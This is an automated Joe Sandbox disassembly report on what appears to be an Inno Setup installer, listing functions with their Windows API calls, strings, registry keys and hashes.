Instruction ID: b00500c56d477975086af7ab451da62873e29dfbcf9d38a71ba2b07221aa1eb7
Opcode Fuzzy Hash: 75314b2eaa4bf69177d09f864bb6ec6c8c78ec8614df53f68c0acf1a6219d738
Instruction Fuzzy Hash: BB31EDB0A51614AEEF00ABA5EDC6A5E3394E7087147100D7EB50497192D77C6C4A8F2C

Uniqueness

Uniqueness Score: -1.00%

Function 0041CAD4 Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON

Download Yara Rule

APIs

72E5AC50.USER32(00000000,?,0041AA0C,?), ref: 0041CB08
72E5A590.GDI32(?,00000000,?,0041AA0C,?), ref: 0041CB14
72E5A410.GDI32(0041AA0C,?,00000001,00000001,00000000,00000000,0041CD2A,?,?,00000000,?,0041AA0C,?), ref: 0041CB38
72E5A520.GDI32(?,0041AA0C,?,00000000,0041CD2A,?,?,00000000,?,0041AA0C,?), ref: 0041CB48
SelectObject.GDI32(0041CF04,00000000), ref: 0041CB63
FillRect.USER32 ref: 0041CB9E
SetTextColor.GDI32(0041CF04,00000000), ref: 0041CBB3
SetBkColor.GDI32(0041CF04,00000000), ref: 0041CBCA
PatBlt.GDI32(0041CF04,00000000,00000000,0041AA0C,?,00FF0062), ref: 0041CBE0
72E5A590.GDI32(?,00000000,0041CCE3,?,0041CF04,00000000,?,0041AA0C,?,00000000,0041CD2A,?,?,00000000,?,0041AA0C), ref: 0041CBF3
SelectObject.GDI32(00000000,00000000), ref: 0041CC24
72E5B410.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CCD2,?,?,00000000,0041CCE3,?,0041CF04,00000000,?,0041AA0C), ref: 0041CC3C
72E5B150.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CCD2,?,?,00000000,0041CCE3,?,0041CF04,00000000,?), ref: 0041CC45
72E5B410.GDI32(0041CF04,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CCD2,?,?,00000000,0041CCE3), ref: 0041CC54
72E5B150.GDI32(0041CF04,0041CF04,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CCD2,?,?,00000000,0041CCE3), ref: 0041CC5D
SetTextColor.GDI32(00000000,00000000), ref: 0041CC76
SetBkColor.GDI32(00000000,00000000), ref: 0041CC8D
72E697E0.GDI32(0041CF04,00000000,00000000,0041AA0C,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CCD2,?,?,00000000), ref: 0041CCA9
SelectObject.GDI32(00000000,?), ref: 0041CCB6
DeleteDC.GDI32(00000000), ref: 0041CCCC

Part of subcall function 0041A120: GetSysColor.USER32(?), ref: 0041A12A

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Color$ObjectSelect$A590B150B410Text$A410A520DeleteE697FillRect
String ID:
API String ID: 3921020894-0
Opcode ID: d6d250347b78cab22f9e5047a66c506a469bac8e7be5dd0b898b332a2b22f203
Instruction ID: 290c54d875c6524fc3f19ced98f47c6901c6adc70a2cc63b7e88767eb8d85aa7
Opcode Fuzzy Hash: d6d250347b78cab22f9e5047a66c506a469bac8e7be5dd0b898b332a2b22f203
Instruction Fuzzy Hash: 4B61EF71A44604ABDB10EBE5DC86FEFB7B8EB48704F10446AF504E7281D67C9D508B69

Uniqueness

Uniqueness Score: -1.00%

Function 0042DF1C Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(0048C79C,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF56
GetVersion.KERNEL32(00000000,0042E100,?,0048C79C,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF73
GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E100,?,0048C79C,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF8C
6CAD5550.KERNEL32(00000000,advapi32.dll,CheckTokenMembership,00000000,0042E100,?,0048C79C,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF92
FreeSid.ADVAPI32(00000000,0042E107,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0FA

Strings

advapi32.dll, xrefs: 0042DF87
CheckTokenMembership, xrefs: 0042DF82

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: AllocateD5550FreeHandleInitializeModuleVersion
String ID: CheckTokenMembership$advapi32.dll
API String ID: 1611730698-1888249752
Opcode ID: c9deeabe0e51be14b57a484d0583af0611c7fb3cdb7b7e1f9c5916997f3a1601
Instruction ID: f569368b677594a0ca59dd8d50db1b9a46e0ad1f5f47a6d2aae22f3b0f4dbcaf
Opcode Fuzzy Hash: c9deeabe0e51be14b57a484d0583af0611c7fb3cdb7b7e1f9c5916997f3a1601
Instruction Fuzzy Hash: 4A519471B042259EDB10EAE6DC86BBF77ACEF04704F90047BB900E6282D57D99018A6E

Uniqueness

Uniqueness Score: -1.00%

Function 0048B020 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 247synchronizationCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005,00000000,0048B3CD,?,?,00000000,?,00000000,00000000,?,0048B6ED,00000000,0048B6F7,?,00000000), ref: 0048B0A3
CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0048B3CD,?,?,00000000,?,00000000,00000000,?,0048B6ED,00000000), ref: 0048B0B6
ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0048B3CD,?,?,00000000,?,00000000,00000000), ref: 0048B0C6
MsgWaitForMultipleObjects.USER32 ref: 0048B0E7
ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0048B3CD,?,?,00000000,?,00000000), ref: 0048B0F7

Part of subcall function 0042D394: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D41F,?,?,00000000,?,?,0048AA50,00000000,0048ABE3,?,?,00000005), ref: 0042D3C9

Strings

Setup, xrefs: 0048B08F
.msg, xrefs: 0048B11A
.lst, xrefs: 0048B134
Inno-Setup-RegSvr-Mutex, xrefs: 0048B0AD
/REG, xrefs: 0048B055
/REGU, xrefs: 0048B079

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
API String ID: 2000705611-3672972446
Opcode ID: f0b5a17cc245d39787d778605bfe403336b8dd3094fe9eccddebbaafcdbfdac9
Instruction ID: e567365e2edbf44dac8aaf4dc4f34d553573b61eaa8a14842a563c927ff724aa
Opcode Fuzzy Hash: f0b5a17cc245d39787d778605bfe403336b8dd3094fe9eccddebbaafcdbfdac9
Instruction Fuzzy Hash: 5C91C230A042049FDB11FBA5C856BAEBBB4EB49704F5148A7F800AB792D77DAC05CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B474 Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON

Download Yara Rule

APIs

72E5A590.GDI32(00000000,?,00000000,?), ref: 0041B48B
72E5A590.GDI32(00000000,00000000,?,00000000,?), ref: 0041B495
GetObjectA.GDI32(?,00000018,00000004), ref: 0041B4A7
72E5A410.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B4BE
72E5AC50.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B4CA
72E5A520.GDI32(00000000,0000000B,?,00000000,0041B523,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B4F7
72E5B380.USER32(00000000,00000000,0041B52A,00000000,0041B523,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B51D
SelectObject.GDI32(00000000,?), ref: 0041B538
SelectObject.GDI32(?,00000000), ref: 0041B547
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B573
SelectObject.GDI32(00000000,00000000), ref: 0041B581
SelectObject.GDI32(?,00000000), ref: 0041B58F
DeleteDC.GDI32(00000000), ref: 0041B598
DeleteDC.GDI32(?), ref: 0041B5A1

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Object$Select$A590Delete$A410A520B380Stretch
String ID:
API String ID: 956127455-0
Opcode ID: 0aa4171e73c738f3ed35fbf04f4c3f4c009d14ea486f04d193f536f391bd58e1
Instruction ID: 8e1c141f7ffe4df06b5d7521c42b4083d07a835c5a738f326f949a81a19cf48d
Opcode Fuzzy Hash: 0aa4171e73c738f3ed35fbf04f4c3f4c009d14ea486f04d193f536f391bd58e1
Instruction Fuzzy Hash: 8E41EF71E44609BFDB10EBE9D845FEFB7B8EB08704F104566B614FB281D6785E408BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00453110 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0

RegQueryValueExA.ADVAPI32(00457A86,00000000,00000000,?,00000000,?,00000000,004533A9,?,00457A86,00000003,00000000,00000000,004533E0), ref: 00453229

Part of subcall function 0042E6D0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451D17,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E6EF

RegQueryValueExA.ADVAPI32(00457A86,00000000,00000000,00000000,?,00000004,00000000,004532F3,?,00457A86,00000000,00000000,?,00000000,?,00000000), ref: 004532AD
RegQueryValueExA.ADVAPI32(00457A86,00000000,00000000,00000000,?,00000004,00000000,004532F3,?,00457A86,00000000,00000000,?,00000000,?,00000000), ref: 004532DC

Strings

, xrefs: 0045319A
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453147
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453180
RegOpenKeyEx, xrefs: 004531AC

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: QueryValue$D6790FormatMessage
String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 741102441-1577016196
Opcode ID: 291ee833736b765a42f7e4c3501b99a39aa0f47eb3096c290d65e24ef0e1b666
Instruction ID: 936de7cad3d5af6865a02f705fb0ee734affc7f522bca8c011dcaa03fd34f40a
Opcode Fuzzy Hash: 291ee833736b765a42f7e4c3501b99a39aa0f47eb3096c290d65e24ef0e1b666
Instruction Fuzzy Hash: CA912471904608ABDF10DF95C942BEEB7F8EB08345F10446BF904F7292DA799B09CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00456300 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 63sleepsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94

CloseHandle.KERNEL32(00000000), ref: 00456330
TerminateProcess.KERNEL32(00000000,00000001,00000000,00002710,00000000), ref: 0045634D
WaitForSingleObject.KERNEL32(00000000,00002710,00000000), ref: 0045635A
GetExitCodeProcess.KERNEL32 ref: 0045636A
CloseHandle.KERNEL32(00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 004563B0
Sleep.KERNEL32(000000FA,00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 004563C9

Strings

Helper process exited with failure code: 0x%x, xrefs: 00456397
Helper process exited, but failed to get exit code., xrefs: 004563A3
Stopping 64-bit helper process., xrefs: 00456320
Helper process exited., xrefs: 00456379
Helper isn't responding; killing it., xrefs: 0045633E

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseHandleProcess$CodeExitLocalObjectSingleSleepTerminateTimeWait
String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process.
API String ID: 3354603272-531598853
Opcode ID: 82dd5589c4a1b1667aa46219dc32579f794879d120c0b2f60b41663e5ed864c5
Instruction ID: 9b7f2ab07430efa22c8a7431e96b691d9f1dfba80aa7278ab83026af9fdd60fa
Opcode Fuzzy Hash: 82dd5589c4a1b1667aa46219dc32579f794879d120c0b2f60b41663e5ed864c5
Instruction Fuzzy Hash: CD11AF70A057009ADB10AB68888575E23D48F08305F45882FBEC5DB2D3C73C884CDB2F

Uniqueness

Uniqueness Score: -1.00%

Function 00452DC4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DC7C: 6CAD64E0.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DCA8

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00452F9B,?,00000000,0045305F), ref: 00452EEB
RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00452F9B,?,00000000,0045305F), ref: 00453027

Part of subcall function 0042E6D0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451D17,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E6EF

Strings

RegCreateKeyEx, xrefs: 00452E5F
, xrefs: 00452E4D
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452E33
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452E03

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: CloseFormatMessageQueryValue
String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2240843642-1280779767
Opcode ID: 9613e4855c050960e8fa881c17536d95f92b4673aaa077709d432140edc12092
Instruction ID: 65fa3514b9301d2a41a7ae804044056a1f5ce6c6599497d784368b85e637474e
Opcode Fuzzy Hash: 9613e4855c050960e8fa881c17536d95f92b4673aaa077709d432140edc12092
Instruction Fuzzy Hash: 21811F72900209AFDB10DFE5D941BEFB7B8EB09705F10442BF904F7292D7799A098B69

Uniqueness

Uniqueness Score: -1.00%

Function 0045769C Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,004578DF,?,?,?,?), ref: 00457791

Part of subcall function 00451424: 6CAD5F60.KERNEL32(00000000,00000000,00451481,?,-00000001,?), ref: 0045145B
Part of subcall function 00451424: GetLastError.KERNEL32(00000000,00000000,00451481,?,-00000001,?), ref: 00451463

Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94

Strings

Failed to strip read-only attribute., xrefs: 00457776
Deleting file: %s, xrefs: 00457730
Failed to delete the file; it may be in use (%d)., xrefs: 00457880
.HLP, xrefs: 004576D3
.GID, xrefs: 004576E4
.FTS, xrefs: 004576FD
The file appears to be in use (%d). Will delete on restart., xrefs: 004577DA
Stripped read-only attribute., xrefs: 0045776A

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: ErrorLast$LocalTime
String ID: .FTS$.GID$.HLP$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
API String ID: 3586426482-88052198
Opcode ID: c53927524a0be121146ecac79b4154f9cb06472446eed1adc4c29ecd637aa9d7
Instruction ID: d1a5732fae48b35c6b067986d8cdc98c863a1d332040d828df944f2f84c25ea7
Opcode Fuzzy Hash: c53927524a0be121146ecac79b4154f9cb06472446eed1adc4c29ecd637aa9d7
Instruction Fuzzy Hash: 7B51DB30B082445BDB00EB69A8857AE7BA5AB49315F00847AEC009B393C77C9E4DCB99

Uniqueness

Uniqueness Score: -1.00%

Function 00489A20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 0045229C: 6CAD5CA0.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00489BF1,_iu,?,00000000,004523D6), ref: 0045238B
Part of subcall function 0045229C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00489BF1,_iu,?,00000000,004523D6), ref: 0045239B

6CAD5AA0.KERNEL32(00000000,00000000,00000000,00000000,00489BF1), ref: 00489A9D
6CAD69D0.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,00489BF1), ref: 00489ABE
CreateWindowExA.USER32 ref: 00489AE5
SetWindowLongA.USER32 ref: 00489AF8
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00489BC4,?,?,000000FC,00489474,00000000,STATIC,00489C00), ref: 00489B28
MsgWaitForMultipleObjects.USER32 ref: 00489B9C
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00489BC4,?,?,000000FC,00489474,00000000), ref: 00489BA8

Part of subcall function 004525EC: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004526D3

72E69840.USER32(?,00489BCB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00489BC4,?,?,000000FC,00489474,00000000,STATIC), ref: 00489BBE

Strings

STATIC, xrefs: 00489ADE
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x , xrefs: 00489B57

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Window$CloseHandle$CreateE69840LongMultipleObjectsPrivateProfileStringWaitWrite
String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
API String ID: 2316613676-2312673372
Opcode ID: b6d81cb5deb64343c64eaf6fd9441b967f929e7c7847470b12341b3c670fdddb
Instruction ID: f15b8aae4c78235ced6120211af2219e00c220a19f9896692e628c5bb0c8e16d
Opcode Fuzzy Hash: b6d81cb5deb64343c64eaf6fd9441b967f929e7c7847470b12341b3c670fdddb
Instruction Fuzzy Hash: 78415D71A00608AEDF10FBA5DC42FAE77F8EB09714F10497AF510F7291D679AE008B68

Uniqueness

Uniqueness Score: -1.00%

Function 0042E99C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0042E9A8
GetModuleHandleA.KERNEL32(user32.dll), ref: 0042E9BC
6CAD5550.KERNEL32(00000000,MonitorFromWindow,user32.dll), ref: 0042E9C9
6CAD5550.KERNEL32(00000000,GetMonitorInfoA,00000000,MonitorFromWindow,user32.dll), ref: 0042E9D6
GetWindowRect.USER32 ref: 0042EA22
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 0042EA60

Strings

MonitorFromWindow, xrefs: 0042E9C3
GetMonitorInfoA, xrefs: 0042E9D0
(, xrefs: 0042EA01
user32.dll, xrefs: 0042E9B7

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Window$D5550$ActiveHandleModuleRect
String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
API String ID: 3275387371-3407710046
Opcode ID: 9265eb0d5d374d6e5454a4b18053e0e4af1e5ba6544aec4509c430739ed00abd
Instruction ID: 7fa31d1e0882b40fe014ad80680a7c2db7e1f7962834736ed83b4a6a8dfe5178
Opcode Fuzzy Hash: 9265eb0d5d374d6e5454a4b18053e0e4af1e5ba6544aec4509c430739ed00abd
Instruction Fuzzy Hash: 77219F767016256BD710DA699C81F3F73D8EB84724F494A2DF944AB381EA78EC008B59

Uniqueness

Uniqueness Score: -1.00%

Function 0044D1B0 Relevance: 17.0, APIs: 11, Instructions: 477windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000129,00000000,00000000), ref: 0044D230
LineDDA.GDI32(?,?,?,?,Function_0004CACC,?), ref: 0044D381
LineDDA.GDI32(?,?,?,?,Function_0004CACC,?), ref: 0044D3A5
DrawFrameControl.USER32 ref: 0044D4B4

Part of subcall function 0041AD28: FillRect.USER32 ref: 0041AD50

GetTextColor.GDI32(00000000), ref: 0044D5AF
GetSysColor.USER32(00000011), ref: 0044D5D1
SetTextColor.GDI32(00000000,00000000), ref: 0044D5DF
SetTextColor.GDI32(00000000,00000000), ref: 0044D609
OffsetRect.USER32(00000000,00000000,?), ref: 0044D6AA
InflateRect.USER32(?,00000001,00000001), ref: 0044D77A
SetTextColor.GDI32(00000000,?), ref: 0044D795

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd

Similarity

API ID: Color$Text$Rect$Line$ControlDrawFillFrameInflateMessageOffsetSend
String ID:
API String ID: 3787931423-0
Opcode ID: 668120ce3816169344680d3d91ae975889dad7cdb0900ea9c3bddfdc5a481bf7
Instruction ID: 06a95b64524c3b1db15d8e3d88035710d567d3bd60866f0deb3bf5ae9595a7e7
Opcode Fuzzy Hash: 668120ce3816169344680d3d91ae975889dad7cdb0900ea9c3bddfdc5a481bf7
Instruction Fuzzy Hash: D8122C74E00248AFEB01DFA8C985BEEB7F5AF49304F1445AAE504E7352D778AE41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0046AB0C Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 246COMMON

Download Yara Rule

APIs

SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046ACC6

Strings

Filename: %s, xrefs: 0046ABC6
{group}\, xrefs: 0046AB59
Desktop.ini, xrefs: 0046AD82
target.lnk, xrefs: 0046AD4B
.pif, xrefs: 0046AB90, 0046AC72
.lnk, xrefs: 0046AB80

Memory Dump Source

Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
